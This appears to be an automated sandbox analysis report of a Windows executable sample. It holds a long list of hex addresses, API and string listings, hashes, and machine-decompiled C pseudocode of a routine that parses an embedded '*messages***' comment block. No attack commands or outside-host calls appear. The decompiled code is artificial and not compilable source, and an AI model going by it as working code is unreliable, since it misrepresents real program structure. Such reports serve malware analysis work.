                                                    0x00000000
                                                    0x00cdcd0b
                                                    0x00cdccd8
                                                    0x00cdccd8
                                                    0x00cdccdb
                                                    0x00cdccf4
                                                    0x00cdccfa
                                                    0x00cdccfa
                                                    0x00000000
                                                    0x00cdccfa
                                                    0x00cdccdd
                                                    0x00cdccdd
                                                    0x00cdcce0
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcce2
                                                    0x00cdcce2
                                                    0x00cdcce5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcceb
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcd58
                                                    0x00cdcd5a
                                                    0x00cdcd61
                                                    0x00cdcd62
                                                    0x00cdcd68
                                                    0x00cdcd70
                                                    0x00cdcd72
                                                    0x00cdcd75
                                                    0x00cdce25
                                                    0x00cdce25
                                                    0x00cdce29
                                                    0x00cdce38
                                                    0x00cdce3c
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce42
                                                    0x00cdce45
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce4b
                                                    0x00cdce4b
                                                    0x00cdce4d
                                                    0x00cdce4e
                                                    0x00cdce4e
                                                    0x00cdce4f
                                                    0x00cdce50
                                                    0x00cdce53
                                                    0x00000000
                                                    0x00cdce53
                                                    0x00cdce2b
                                                    0x00cdce2e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce34
                                                    0x00000000
                                                    0x00cdce34
                                                    0x00cdcd7b
                                                    0x00cdcd81
                                                    0x00cdcd83
                                                    0x00cdcd84
                                                    0x00cdcd89
                                                    0x00cdcd8a
                                                    0x00cdcd8b
                                                    0x00cdcd8d
                                                    0x00cdce22
                                                    0x00cdce22
                                                    0x00000000
                                                    0x00cdce22
                                                    0x00cdcd93
                                                    0x00cdcd93
                                                    0x00cdcd96
                                                    0x00cdcd99
                                                    0x00cdcd9b
                                                    0x00cdcd9e
                                                    0x00cdcda4
                                                    0x00cdcda6
                                                    0x00cdcda7
                                                    0x00cdcdad
                                                    0x00cdcdae
                                                    0x00cdcdb3
                                                    0x00cdcdb6
                                                    0x00cdcdb8
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcdba
                                                    0x00cdcdbc
                                                    0x00cdcdbc
                                                    0x00cdcdc4
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcdcb
                                                    0x00cdcdd2
                                                    0x00cdcdd7
                                                    0x00cdcdde
                                                    0x00cdcde0
                                                    0x00cdcde2
                                                    0x00cdcde9
                                                    0x00cdcdee
                                                    0x00cdcdf0
                                                    0x00cdcdf2
                                                    0x00cdcdf4
                                                    0x00cdcdf4
                                                    0x00cdcdfa
                                                    0x00cdce01
                                                    0x00cdce06
                                                    0x00cdce08
                                                    0x00cdce0a
                                                    0x00cdce0c
                                                    0x00cdce0c
                                                    0x00cdce0d
                                                    0x00cdce0f
                                                    0x00cdce15
                                                    0x00cdce16
                                                    0x00cdce1c
                                                    0x00cdce1e
                                                    0x00cdce20
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce20
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce87
                                                    0x00cdce8a
                                                    0x00cdd009
                                                    0x00cdd00c
                                                    0x00cdd012
                                                    0x00cdd018
                                                    0x00cdd01a
                                                    0x00cdd01a
                                                    0x00cdd024
                                                    0x00cdd024
                                                    0x00000000
                                                    0x00cdd00c
                                                    0x00cdce90
                                                    0x00cdce96
                                                    0x00cdcea4
                                                    0x00cdceab
                                                    0x00cdceb0
                                                    0x00cdceb2
                                                    0x00cdceb4
                                                    0x00cdceb9
                                                    0x00cdceb9
                                                    0x00cdced1
                                                    0x00cdcede
                                                    0x00cdcee3
                                                    0x00cdcee5
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdceb7
                                                    0x00cdceb7
                                                    0x00cdceb8
                                                    0x00cdceb8
                                                    0x00cdcef1
                                                    0x00cdcef7
                                                    0x00cdcefe
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf04
                                                    0x00cdcf0a
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf10
                                                    0x00cdcf12
                                                    0x00cdcf19
                                                    0x00cdcf1f
                                                    0x00cdcf21
                                                    0x00cdcf22
                                                    0x00cdcf27
                                                    0x00cdcf28
                                                    0x00cdcf29
                                                    0x00cdcf2b
                                                    0x00cdcf7b
                                                    0x00cdcf7b
                                                    0x00cdcf82
                                                    0x00cdcf90
                                                    0x00cdcfa1
                                                    0x00cdcfaf
                                                    0x00cdcfaf
                                                    0x00cdcfbb
                                                    0x00cdcfc0
                                                    0x00cdcfc2
                                                    0x00cdcfd2
                                                    0x00cdcfdc
                                                    0x00cdcfe1
                                                    0x00cdcfe4
                                                    0x00cdcfef
                                                    0x00cdcff1
                                                    0x00cdcff8
                                                    0x00cdcffe
                                                    0x00cdcffe
                                                    0x00000000
                                                    0x00cdcfe4
                                                    0x00cdcf2d
                                                    0x00cdcf34
                                                    0x00cdcf36
                                                    0x00cdcf39
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf3b
                                                    0x00cdcf3e
                                                    0x00cdcf3e
                                                    0x00cdcf42
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf44
                                                    0x00cdcf4c
                                                    0x00cdcf4d
                                                    0x00cdcf4f
                                                    0x00cdcf52
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcf54
                                                    0x00cdcf61
                                                    0x00cdcf6c
                                                    0x00cdcf71
                                                    0x00cdcf71
                                                    0x00cdcf73
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd030
                                                    0x00cdd033
                                                    0x00cdd035
                                                    0x00cdd03c
                                                    0x00cdd03e
                                                    0x00cdd044
                                                    0x00cdd045
                                                    0x00cdd04a
                                                    0x00cdd04b
                                                    0x00cdd04b
                                                    0x00cdd050
                                                    0x00cdd053
                                                    0x00cdd059
                                                    0x00cdd059
                                                    0x00cdd05e
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd06a
                                                    0x00cdd06d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd073
                                                    0x00cdd075
                                                    0x00cdd07c
                                                    0x00cdd084
                                                    0x00cdd08a
                                                    0x00cdd08d
                                                    0x00cdd0b0
                                                    0x00cdd0b7
                                                    0x00cdd08f
                                                    0x00cdd08f
                                                    0x00cdd092
                                                    0x00cdd0a2
                                                    0x00cdd0a9
                                                    0x00cdd094
                                                    0x00cdd094
                                                    0x00cdd09b
                                                    0x00cdd09b
                                                    0x00cdd092
                                                    0x00cdd0bc
                                                    0x00cdd0ca
                                                    0x00cdd0cf
                                                    0x00cdd0d1
                                                    0x00cdd0d8
                                                    0x00cdd0e7
                                                    0x00cdd0ee
                                                    0x00cdd0f3
                                                    0x00cdd0f5
                                                    0x00cdd0f6
                                                    0x00cdd0fd
                                                    0x00cdd150
                                                    0x00cdd155
                                                    0x00cdd157
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd15d
                                                    0x00cdd164
                                                    0x00cdd16a
                                                    0x00cdd16c
                                                    0x00cdd16f
                                                    0x00cdd221
                                                    0x00000000
                                                    0x00cdd221
                                                    0x00cdd175
                                                    0x00cdd178
                                                    0x00cdd178
                                                    0x00cdd17a
                                                    0x00cdd17b
                                                    0x00cdd17e
                                                    0x00cdd188
                                                    0x00cdd188
                                                    0x00cdd18a
                                                    0x00cdd194
                                                    0x00cdd199
                                                    0x00cdd19b
                                                    0x00cdd1fd
                                                    0x00cdd1fd
                                                    0x00000000
                                                    0x00cdd1fd
                                                    0x00cdd1a4
                                                    0x00cdd1aa
                                                    0x00cdd1af
                                                    0x00cdd1b1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd1b3
                                                    0x00cdd1b5
                                                    0x00cdd1b6
                                                    0x00cdd1b9
                                                    0x00cdd1bb
                                                    0x00cdd1be
                                                    0x00cdd1d4
                                                    0x00cdd1d6
                                                    0x00cdd1d8
                                                    0x00cdd1de
                                                    0x00cdd1de
                                                    0x00cdd1e1
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd1db
                                                    0x00cdd1db
                                                    0x00cdd1db
                                                    0x00cdd1e3
                                                    0x00cdd1e9
                                                    0x00cdd1eb
                                                    0x00cdd1f0
                                                    0x00cdd1f3
                                                    0x00cdd1f8
                                                    0x00000000
                                                    0x00cdd1f8
                                                    0x00cdd1c0
                                                    0x00cdd1c7
                                                    0x00cdd1cc
                                                    0x00000000
                                                    0x00cdd1cc
                                                    0x00cdd180
                                                    0x00cdd182
                                                    0x00cdd183
                                                    0x00cdd186
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdd200
                                                    0x00cdd200
                                                    0x00cdd203
                                                    0x00cdd206
                                                    0x00cdd208
                                                    0x00cdd208
                                                    0x00cdd211
                                                    0x00cdd216
                                                    0x00cdd218
                                                    0x00cdd21a
                                                    0x00cdd21c
                                                    0x00cdd21c
                                                    0x00000000
                                                    0x00cdd0ff
                                                    0x00cdd107
                                                    0x00cdd113
                                                    0x00cdd119
                                                    0x00cdd11a
                                                    0x00cdd11b
                                                    0x00cdd120
                                                    0x00cdd121
                                                    0x00cdd122
                                                    0x00cdd124
                                                    0x00cdd12a
                                                    0x00cdd12c
                                                    0x00cdd13f
                                                    0x00cdd13f
                                                    0x00cdd226
                                                    0x00cdd226
                                                    0x00cdd22e
                                                    0x00cdd238
                                                    0x00cdd23f
                                                    0x00cdd23f
                                                    0x00cdd24c
                                                    0x00cdd253
                                                    0x00cdd258
                                                    0x00cdd260
                                                    0x00cdd26c
                                                    0x00cdd26c
                                                    0x00cdd279
                                                    0x00cdd27e
                                                    0x00cdd286
                                                    0x00cdd290
                                                    0x00cdd29d
                                                    0x00cdd2a4
                                                    0x00cdd2a4
                                                    0x00cdd2b1
                                                    0x00cdd2b8
                                                    0x00cdd2bd
                                                    0x00cdd2c5
                                                    0x00cdd2cb
                                                    0x00cdd2cd
                                                    0x00cdd2cd
                                                    0x00cdd2e2
                                                    0x00cdd2e7
                                                    0x00cdd2f3
                                                    0x00cdd2f5
                                                    0x00cdd306
                                                    0x00cdd313
                                                    0x00000000
                                                    0x00cdd2f7
                                                    0x00cdd302
                                                    0x00cdd304
                                                    0x00cdd318
                                                    0x00cdd318
                                                    0x00cdd324
                                                    0x00cdd331
                                                    0x00cdd33d
                                                    0x00cdd344
                                                    0x00cdd349
                                                    0x00cdd350
                                                    0x00cdd356
                                                    0x00cdd35d
                                                    0x00cdd363
                                                    0x00cdd36a
                                                    0x00cdd36c
                                                    0x00cdd36e
                                                    0x00cdd370
                                                    0x00cdd372
                                                    0x00cdd378
                                                    0x00cdd37a
                                                    0x00cdd37c
                                                    0x00cdd37e
                                                    0x00cdd384
                                                    0x00cdd386
                                                    0x00cdd390
                                                    0x00cdd393
                                                    0x00cdd399
                                                    0x00cdd3a8
                                                    0x00cdd3ad
                                                    0x00cdd3b4
                                                    0x00cdd3b6
                                                    0x00cdd3b7
                                                    0x00cdd3bd
                                                    0x00cdd3be
                                                    0x00cdd3c0
                                                    0x00cdd3c5
                                                    0x00cdd3c5
                                                    0x00000000
                                                    0x00cdd3b4
                                                    0x00000000
                                                    0x00cdd304
                                                    0x00cdd2f5
                                                    0x00000000
                                                    0x00cdd3cd
                                                    0x00cdd3d0
                                                    0x00cdd3d2
                                                    0x00cdd3d2
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdcd17
                                                    0x00cdcd1f
                                                    0x00cdcd25
                                                    0x00cdcd28
                                                    0x00cdcd4c
                                                    0x00cdcd2a
                                                    0x00cdcd2a
                                                    0x00cdcd2d
                                                    0x00cdcd40
                                                    0x00cdcd2f
                                                    0x00cdcd2f
                                                    0x00cdcd31
                                                    0x00cdcd36
                                                    0x00cdcd36
                                                    0x00cdcd2d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdce5d
                                                    0x00cdce5e
                                                    0x00cdce63
                                                    0x00cdce63
                                                    0x00cdce63
                                                    0x00cdce66
                                                    0x00cdce6b
                                                    0x00cdce71
                                                    0x00cdce71
                                                    0x00cdce7d
                                                    0x00cdce7d
                                                    0x00000000
                                                    0x00000000
                                                    0x00cdc7a2
                                                    0x00cdc7a2
                                                    0x00cdc7a7
                                                    0x00cdc7a8
                                                    0x00cdc7a9
                                                    0x00cdc7ae
                                                    0x00cdc7b4
                                                    0x00cdc7b7
                                                    0x00000000
                                                    0x00cdc7b9
                                                    0x00cdc7b9
                                                    0x00000000
                                                    0x00cdc7b9
                                                    0x00cdd3d9
                                                    0x00cdd3d9
                                                    0x00cdd3de
                                                    0x00cdd3e2
                                                    0x00cdd3e6
                                                    0x00cdd3ed
                                                    0x00cdd3f4
                                                    0x00cdd3f7
                                                    0x00cdd3fc
                                                    0x00cdd3ff
                                                    0x00cdd402
                                                    0x00cdd40c

                                                    APIs
                                                    • __EH_prolog.LIBCMT ref: 00CDC744
                                                      • Part of subcall function 00CDB314: ExpandEnvironmentStringsW.KERNEL32(00000000,?,00001000), ref: 00CDB3FB
                                                    • _wcslen.LIBCMT ref: 00CDCA0A
                                                    • _wcslen.LIBCMT ref: 00CDCA13
                                                    • SetWindowTextW.USER32(?,?), ref: 00CDCA71
                                                    • _wcslen.LIBCMT ref: 00CDCAB3
                                                    • _wcsrchr.LIBVCRUNTIME ref: 00CDCBFB
                                                    • GetDlgItem.USER32(?,00000066), ref: 00CDCC36
                                                    • SetWindowTextW.USER32(00000000,?), ref: 00CDCC46
                                                    • SendMessageW.USER32(00000000,00000143,00000000,00D0A472), ref: 00CDCC54
                                                    • SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00CDCC7F
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.339773851.0000000000CC1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00CC0000, based on PE: true
                                                    • Associated: 00000000.00000002.339764427.0000000000CC0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000CFE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D05000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340504521.0000000000D22000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000000.00000002.340535593.0000000000D23000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_cc0000_026910003102350.jbxd
                                                    Similarity
                                                    • API ID: _wcslen$MessageSendTextWindow$EnvironmentExpandH_prologItemStrings_wcsrchr
                                                    • String ID: %s.%d.tmp$<br>$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion
                                                    • API String ID: 2804936435-312220925
                                                    • Opcode ID: 719413e01eb0c77c492401711633d3eadc5eaf56f63f26057fb41f9571ad63e8
                                                    • Instruction ID: ad2e6d5ee8039148ba8fc4a5a06468c1bedcf734e20bb20036a211b9adc8f1be
                                                    • Opcode Fuzzy Hash: 719413e01eb0c77c492401711633d3eadc5eaf56f63f26057fb41f9571ad63e8
                                                    • Instruction Fuzzy Hash: 68E160B2900259AADB25DBA4DD85EEE73BCAB04310F0040A7F719E7250EF749F85DB61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00CCDA67 Relevance: 23.4, APIs: 4, Strings: 9, Instructions: 663COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 85%
                                                    			E00CCDA67(char* __ecx, signed int __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				char* _t245;
				void* _t246;
				WCHAR* _t247;
				void* _t252;
				unsigned int _t258;
				signed int _t264;
				signed int _t268;
				void* _t279;
				signed short* _t283;
				void* _t284;
				void* _t290;
				signed short* _t294;
				void* _t295;
				signed int _t299;
				signed int _t303;
				signed int _t318;
				signed int _t322;
				signed int _t324;
				signed int _t326;
				signed int _t333;
				char* _t334;
				signed int _t338;
				short _t341;
				void* _t342;
				signed int _t346;
				char* _t348;
				char* _t350;
				char* _t355;
				void* _t358;
				void* _t360;
				void* _t363;
				signed int _t372;
				char* _t374;
				unsigned int _t385;
				unsigned int _t389;
				signed int _t392;
				signed int _t397;
				signed int _t399;
				void* _t400;
				signed int _t401;
				void* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t410;
				signed int _t411;
				signed int _t412;
				char* _t421;
				signed int _t424;
				signed int _t425;
				void* _t430;
				char* _t434;
				signed int _t443;
				signed int _t444;
				signed int _t447;
				signed int _t448;
				signed int _t449;
				signed int _t450;
				char* _t451;
				signed int _t453;
				signed int _t455;
				void* _t456;
				intOrPtr* _t459;
				signed int _t461;
				signed int _t462;
				char* _t463;
				signed int _t466;
				signed int _t467;
				char** _t468;
				void* _t470;
				void* _t471;
				void* _t473;
				void* _t477;
				void* _t478;

				_t443 = __edx;
				_t471 = _t470 - 0x54;
				E00CDEB78(0xcf29bd, _t468);
				E00CDEC50(0x41fc);
				_t245 = 0x5c;
				_push(_t245);
				_push(_t468[0x18]);
				_t459 = __ecx;
				_t468[4] = _t245;
				_t468[0xe] = __ecx;
				_t246 = E00CE22C6(__ecx);
				_t372 = 0;
				_t475 = _t246;
				_t247 = _t468 - 0x31d0;
				if(_t246 != 0) {
					E00CD0602(_t247, _t468[0x18], 0x800);
				} else {
					GetModuleFileNameW(0, _t247, 0x800);
					 *((short*)(E00CCC29A(_t475, _t468 - 0x31d0))) = 0;
					E00CD05DA(_t475, _t468 - 0x31d0, _t468[0x18], 0x800);
				}
				E00CC9556(_t468 - 0x4208);
				_push(4);
				 *(_t468 - 4) = _t372;
				_push(_t468 - 0x31d0);
				if(E00CC98E0(_t468 - 0x4208, _t459) == 0) {
					L125:
					_t252 = E00CC959A(_t468 - 0x4208); // executed
					 *[fs:0x0] =  *((intOrPtr*)(_t468 - 0xc));
					__eflags =  &(_t468[0x16]);
					return _t252;
				} else {
					_t447 = _t372;
					_t477 =  *0xcfe720 - _t447; // 0x64
					if(_t477 <= 0) {
						L7:
						E00CE6310(_t372,  *_t459,  *((intOrPtr*)(_t459 + 4)), 4, E00CCD6E0);
						E00CE6310(_t372,  *((intOrPtr*)(_t459 + 0x14)),  *((intOrPtr*)(_t459 + 0x18)), 4, E00CCD640);
						_t473 = _t471 + 0x20;
						_t468[0x14] = _t372;
						_t448 = _t447 | 0xffffffff;
						_t468[0xf] = _t372;
						while(_t448 == 0xffffffff) {
							_t348 = E00CC9E80(_t468 - 0x4208); // executed
							_t468[0x12] = _t348;
							_t350 = E00CC9BD0(_t468 - 0x4208, _t443, _t468 - 0x21d0, 0x2000);
							_t468[0x11] = _t350;
							_t467 = _t372;
							_t24 = _t350 - 0x10; // -16
							_t434 = _t24;
							_t468[0xa] = _t434;
							if(_t434 < 0) {
								L25:
								_t351 = _t468[0x12];
								L26:
								E00CC9D70(_t468 - 0x4208, _t468,  &(_t351[ &(_t468[0x11][0xfffffffffffffff0])]), _t372, _t372);
								_t355 =  &(_t468[0xf][1]);
								_t468[0xf] = _t355;
								__eflags = _t355 - 0x100;
								if(_t355 < 0x100) {
									continue;
								}
								__eflags = _t448 - 0xffffffff;
								if(_t448 == 0xffffffff) {
									goto L125;
								}
								break;
							} else {
								goto L10;
							}
							L12:
							_t363 = E00CE6740(_t468 - 0x21ce + _t467, "*messages***", 0xb);
							_t473 = _t473 + 0xc;
							if(_t363 == 0) {
								L24:
								_t351 = _t468[0x12];
								_t448 =  &(_t468[0x12][_t467]);
								goto L26;
							} else {
								_t350 = _t468[0x11];
							}
							L14:
							_t443 = 0x2a;
							if( *((intOrPtr*)(_t468 + _t467 - 0x21d0)) != _t443) {
								L18:
								if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x52 ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x61) {
									L21:
									_t467 = _t467 + 1;
									if(_t467 > _t468[0xa]) {
										goto L25;
									} else {
										_t350 = _t468[0x11];
										L10:
										if( *((char*)(_t468 + _t467 - 0x21d0)) != 0x2a ||  *((char*)(_t468 + _t467 - 0x21cf)) != 0x2a) {
											goto L14;
										} else {
											goto L12;
										}
									}
								} else {
									_t358 = E00CE6740(_t468 - 0x21ce + _t467, 0xcf39c8, 4);
									_t473 = _t473 + 0xc;
									if(_t358 == 0) {
										goto L125;
									}
									goto L21;
								}
							}
							_t439 = _t468 - 0x21cc + _t467;
							if( *((intOrPtr*)(_t468 - 0x21cc + _t467 - 2)) == _t443 && _t467 <=  &(_t350[0xffffffffffffffe0])) {
								_t360 = E00CE6088(_t439, L"*messages***", 0xb);
								_t473 = _t473 + 0xc;
								if(_t360 == 0) {
									_t468[0x14] = 1;
									goto L24;
								}
							}
							goto L18;
						}
						asm("cdq");
						E00CC9D70(_t468 - 0x4208, _t468, _t448, _t443, _t372);
						_push(0x200002);
						_t461 = E00CE3E33(_t468 - 0x4208);
						_t468[0x13] = _t461;
						__eflags = _t461;
						if(_t461 == 0) {
							goto L125;
						}
						_t258 = E00CC9BD0(_t468 - 0x4208, _t443, _t461, 0x200000);
						__eflags = _t468[0x14];
						_t385 = _t258;
						_t468[0x12] = _t385;
						if(_t468[0x14] == 0) {
							_push(2 + _t385 * 2);
							_t449 = E00CE3E33(_t385);
							__eflags = _t449;
							if(_t449 == 0) {
								goto L125;
							}
							_t468[0x12][_t461] = _t372;
							E00CD1B84(_t461, _t449,  &(_t468[0x12][1]));
							L00CE3E2E(_t461);
							_t389 = _t468[0x12];
							_t461 = _t449;
							_t468[0x13] = _t461;
							L33:
							_t264 = 0x100000;
							__eflags = _t389 - 0x100000;
							if(_t389 <= 0x100000) {
								_t264 = _t389;
							}
							 *((short*)(_t461 + _t264 * 2)) = 0;
							E00CD05A7(_t468 - 0x108, 0xcf39d0, 0x64);
							_push(0x20002);
							_t450 = E00CE3E33(0);
							_t468[0x11] = _t450;
							__eflags = _t450;
							if(_t450 != 0) {
								__eflags = _t468[0x12];
								_t462 = _t372;
								_t392 = _t372;
								_t468[0xc] = _t462;
								_t268 = _t372;
								 *(_t468 - 0x40) = _t372;
								_t468[0xb] = _t392;
								_t468[0x15] = _t268;
								_t468[0xa] = 0x20;
								_t468[0xf] = 9;
								if(_t468[0x12] <= 0) {
									L109:
									__eflags =  *(_t468 - 0x40);
									if( *(_t468 - 0x40) == 0) {
										_t463 = _t468[0xe];
										L122:
										L00CE3E2E(_t468[0x13]);
										L00CE3E2E(_t468[0x11]);
										_t451 =  &(_t463[0x3c]);
										__eflags = _t463[0x2c] - _t372;
										if(_t463[0x2c] <= _t372) {
											L124:
											 *0xd010b8 = _t463[0x28];
											E00CE6310(_t372,  *_t451, _t463[0x40], 4, E00CCD7A0);
											E00CE6310(_t372, _t463[0x50], _t463[0x54], 4, E00CCD7D0);
											goto L125;
										} else {
											goto L123;
										}
										do {
											L123:
											E00CCE261(_t451, _t443, _t372);
											E00CCE261( &(_t463[0x50]), _t443, _t372);
											_t372 = _t372 + 1;
											__eflags = _t372 - _t463[0x2c];
										} while (_t372 < _t463[0x2c]);
										goto L124;
									}
									_t468[7] = _t392;
									_t468[8] = E00CE8CCE(_t372, _t462, _t468 - 0x40);
									_pop(_t397);
									__eflags = _t462;
									if(_t462 == 0) {
										L118:
										 *(_t450 + _t462 * 2) = 0;
										_t279 = 0x22;
										__eflags =  *_t450 - _t279;
										if( *_t450 == _t279) {
											__eflags = _t450;
										}
										_t468[9] = E00CE7625(_t372, _t450);
										asm("movsd");
										asm("movsd");
										asm("movsd");
										_t463 = _t468[0xe];
										E00CCE27C( &(_t463[0x28]), _t443, _t397, _t397, _t450);
										goto L122;
									}
									_t212 = _t462 - 1; // -1
									_t283 = _t450 + _t212 * 2;
									_t443 = 0x20;
									do {
										_t397 =  *_t283 & 0x0000ffff;
										__eflags = _t397 - _t443;
										if(_t397 == _t443) {
											goto L114;
										}
										__eflags = _t397 - _t468[0xf];
										if(_t397 != _t468[0xf]) {
											break;
										}
										L114:
										_t397 = 0;
										 *_t283 = 0;
										_t283 = _t283 - 2;
										_t462 = _t462 - 1;
										__eflags = _t462;
									} while (_t462 != 0);
									__eflags = _t462;
									if(_t462 != 0) {
										_t284 = 0x22;
										__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t284;
										if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t284) {
											__eflags = 0;
											 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
										}
									}
									goto L118;
								}
								_t468[6] = 0xd;
								_t468[5] = 0xa;
								do {
									_t399 = _t468[0x13];
									__eflags = _t268;
									if(_t268 == 0) {
										L75:
										_t443 =  *(_t399 + _t268 * 2) & 0x0000ffff;
										_t268 = _t268 + 1;
										_t468[0x15] = _t268;
										__eflags = _t443;
										if(_t443 == 0) {
											break;
										}
										__eflags = _t443 - _t468[4];
										if(_t443 != _t468[4]) {
											_t400 = 0xd;
											__eflags = _t443 - _t400;
											if(_t443 == _t400) {
												L93:
												__eflags =  *(_t468 - 0x40);
												if( *(_t468 - 0x40) == 0) {
													L105:
													 *(_t468 - 0x40) = _t372;
													_t462 = _t372;
													_t468[0xb] = _t372;
													L106:
													_t468[0xc] = _t462;
													goto L107;
												}
												_t468[7] = _t468[0xb];
												_t468[8] = E00CE8CCE(_t372, _t462, _t468 - 0x40);
												_pop(_t401);
												__eflags = _t462;
												if(_t462 == 0) {
													L102:
													 *(_t450 + _t462 * 2) = 0;
													_t290 = 0x22;
													__eflags =  *_t450 - _t290;
													if( *_t450 == _t290) {
														__eflags = _t450;
													}
													_t468[9] = E00CE7625(_t372, _t450);
													asm("movsd");
													asm("movsd");
													asm("movsd");
													E00CCE27C( &(_t468[0xe][0x28]), _t443, _t401, _t401, _t450);
													_t450 = _t468[0x11];
													_t268 = _t468[0x15];
													goto L105;
												}
												_t185 = _t462 - 1; // -1
												_t294 = _t450 + _t185 * 2;
												_t443 = 0x20;
												do {
													_t401 =  *_t294 & 0x0000ffff;
													__eflags = _t401 - _t443;
													if(_t401 == _t443) {
														goto L98;
													}
													__eflags = _t401 - _t468[0xf];
													if(_t401 != _t468[0xf]) {
														break;
													}
													L98:
													_t401 = 0;
													 *_t294 = 0;
													_t294 = _t294 - 2;
													_t462 = _t462 - 1;
													__eflags = _t462;
												} while (_t462 != 0);
												__eflags = _t462;
												if(_t462 != 0) {
													_t295 = 0x22;
													__eflags =  *((intOrPtr*)(_t450 + _t462 * 2 - 2)) - _t295;
													if( *((intOrPtr*)(_t450 + _t462 * 2 - 2)) == _t295) {
														__eflags = 0;
														 *((short*)(_t450 + _t462 * 2 - 2)) = 0;
													}
												}
												goto L102;
											}
											_t404 = 0xa;
											__eflags = _t443 - _t404;
											if(_t443 == _t404) {
												goto L93;
											}
											__eflags = _t462 - 0x10000;
											if(_t462 >= 0x10000) {
												goto L107;
											}
											L92:
											 *(_t450 + _t462 * 2) = _t443;
											_t462 = _t462 + 1;
											goto L106;
										}
										__eflags = _t462 - 0x10000;
										if(_t462 >= 0x10000) {
											goto L107;
										}
										_t406 = ( *(_t399 + _t268 * 2) & 0x0000ffff) - 0x22;
										__eflags = _t406;
										if(_t406 == 0) {
											_push(0x22);
											L88:
											_pop(_t407);
											 *(_t450 + _t462 * 2) = _t407;
											_t268 = _t268 + 1;
											_t468[0x15] = _t268;
											_t462 = _t462 + 1;
											goto L106;
										}
										_t410 = _t406 - 0x3a;
										__eflags = _t410;
										if(_t410 == 0) {
											_push(0x5c);
											goto L88;
										}
										_t411 = _t410 - 0x12;
										__eflags = _t411;
										if(_t411 == 0) {
											_push(0xa);
											goto L88;
										}
										_t412 = _t411 - 4;
										__eflags = _t412;
										if(_t412 == 0) {
											_push(0xd);
											goto L88;
										}
										__eflags = _t412 != 0;
										if(_t412 != 0) {
											goto L92;
										}
										_push(9);
										goto L88;
									}
									_t444 =  *(_t399 + _t268 * 2 - 2) & 0x0000ffff;
									__eflags = _t444 - _t468[6];
									if(_t444 == _t468[6]) {
										L42:
										_t443 = 0x3a;
										__eflags =  *(_t399 + _t268 * 2) - _t443;
										if( *(_t399 + _t268 * 2) != _t443) {
											L65:
											_t468[0x10] = _t399 + _t268 * 2;
											_t299 = E00CD045B( *(_t399 + _t268 * 2) & 0x0000ffff);
											__eflags = _t299;
											if(_t299 == 0) {
												L74:
												_t399 = _t468[0x13];
												_t268 = _t468[0x15];
												goto L75;
											}
											E00CD0602(_t468 - 0x298, _t468[0x10], 0x64);
											_t303 = E00CE6105(_t468 - 0x298, L" \t,");
											_t468[0x10] = _t303;
											__eflags = _t303;
											if(_t303 == 0) {
												goto L74;
											}
											 *_t303 = 0;
											E00CD1DA7(_t468 - 0x298, _t468 - 0x16c, 0x64);
											E00CD05A7(_t468 - 0xa4, _t468 - 0x108, 0x64);
											E00CD0580(__eflags, _t468 - 0xa4, _t468 - 0x16c, 0x64);
											E00CD05A7(_t468 - 0x40, _t468 - 0xa4, 0x32);
											_t318 = E00CE6159(_t372, 0, _t443, _t462, _t468 - 0xa4,  *(_t468[0xe]), _t468[0xe][4], 4, E00CCD780);
											_t473 = _t473 + 0x14;
											__eflags = _t318;
											if(_t318 != 0) {
												_t322 =  *_t318 * 0xc;
												__eflags = _t322;
												_t156 = _t322 + 0xcfe270; // 0x28b64ee0
												_t468[0xb] =  *_t156;
											}
											_t268 =  &(( &(_t468[0x15][1]))[_t468[0x10] - _t468 - 0x298 >> 1]);
											__eflags = _t268;
											_t421 = _t468[0x13];
											while(1) {
												_t443 =  *(_t421 + _t268 * 2) & 0x0000ffff;
												__eflags = _t443 - _t468[0xa];
												if(_t443 == _t468[0xa]) {
													goto L72;
												}
												L71:
												__eflags = _t443 - _t468[0xf];
